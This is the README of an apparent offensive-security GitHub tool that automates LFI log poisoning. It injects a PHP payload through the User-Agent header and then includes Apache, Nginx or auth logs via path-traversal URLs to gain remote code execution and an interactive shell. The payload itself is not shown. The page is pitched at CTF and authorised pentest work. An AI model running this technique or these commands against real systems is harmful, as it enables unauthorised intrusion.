BatuhanBaskurt/Ezlogpoiz

GitHub: BatuhanBaskurt/Ezlogpoiz

一款自动化 LFI 日志投毒工具,通过向请求头注入 PHP payload 并利用文件包含触发执行,实现远程代码执行并获取交互式 shell。

Stars: 0 | Forks: 0

# EZLOGPOIZ ``` /$$$$$$$$ /$$$$$$$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$ | $$_____/|_____ $$ | $$ /$$__ $$ /$$__ $$| $$__ $$ /$$__ $$|_ $$_/|_____ $$ | $$ /$$/ | $$ | $$ \ $$| $$ \__/| $$ \ $$| $$ \ $$ | $$ /$$/ | $$$$$ /$$/ | $$ | $$ | $$| $$ /$$$$| $$$$$$$/| $$ | $$ | $$ /$$/ | $$__/ /$$/ | $$ | $$ | $$| $$|_ $$| $$____/ | $$ | $$ | $$ /$$/ | $$ /$$/ | $$ | $$ | $$| $$ \ $$| $$ | $$ | $$ | $$ /$$/ | $$$$$$$$ /$$$$$$$$| $$$$$$$$| $$$$$$/| $$$$$$/| $$ | $$$$$$/ /$$$$$$ /$$$$$$$$ |________/|________/|________/ \______/ \______/ |__/ \______/ |______/|________/ ``` **LFI Log Poisoning 工具** — 为 CTF 与 Pentest 编写的 Python 脚本。 ## 功能介绍? 在存在 LFI(Local File Inclusion)漏洞的目标上,通过 log poisoning 方法实现 RCE(Remote Code Execution),并开启交互式 shell。 **工作原理:** 1. 向 User-Agent 写入 PHP payload(poison) 2. 通过 LFI 包含日志文件(trigger) 3. 清晰展示命令输出(shell) ## 安装 ``` git clone https://github.com/BatuhanBaskurt/ezlogpoiz cd ezlogpoiz pip install -r requirements.txt ``` ## 使用方法 ``` python3 ezlogpoiz.py --url "http://hedef.com/index.php?page=../../../var/log/apache2/access.log" ``` **所有选项:** | 参数 | 说明 | 示例 | |-----------|----------|-------| | `--url` | LFI URL(必填) | `--url "http://hedef.com?page=../../../var/log/apache2/access.log"` | | `-u` | 用户名(Basic Auth) | `-u admin` | | `-p` | 密码(Basic Auth) | `-p admin` | | `-c` | Cookie | `-c "PHPSESSID=abc123"` | **示例:** ``` # 基本使用 python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/apache2/access.log" # 使用 Basic Auth python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/apache2/access.log" -u admin -p admin # 使用 Cookie python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/apache2/access.log" -c "PHPSESSID=abc123" # Nginx 日志 python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/nginx/access.log" # SSH auth 日志 python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/auth.log" ``` ## 环境要求 - Python 3.x - requests ``` pip install requests ``` ## 法律声明 本工具仅为 **CTF 比赛**和**授权的 pentest** 工作而开发。在未经授权的系统上使用是非法的。开发者不承担任何责任。 ## 许可证 MIT License — 版权所有 (c) 2026 Batuhan Başkurt
标签:Apache日志利用, CISA项目, CTF工具, LFI, Log Poisoning, Maven, Python, RCE, User-Agent注入, Webshell, Web安全, 命令执行, 安全测试, 攻击性安全, 无后门, 无线安全, 日志注入, 本地文件包含, 漏洞搜索, 漏洞验证, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护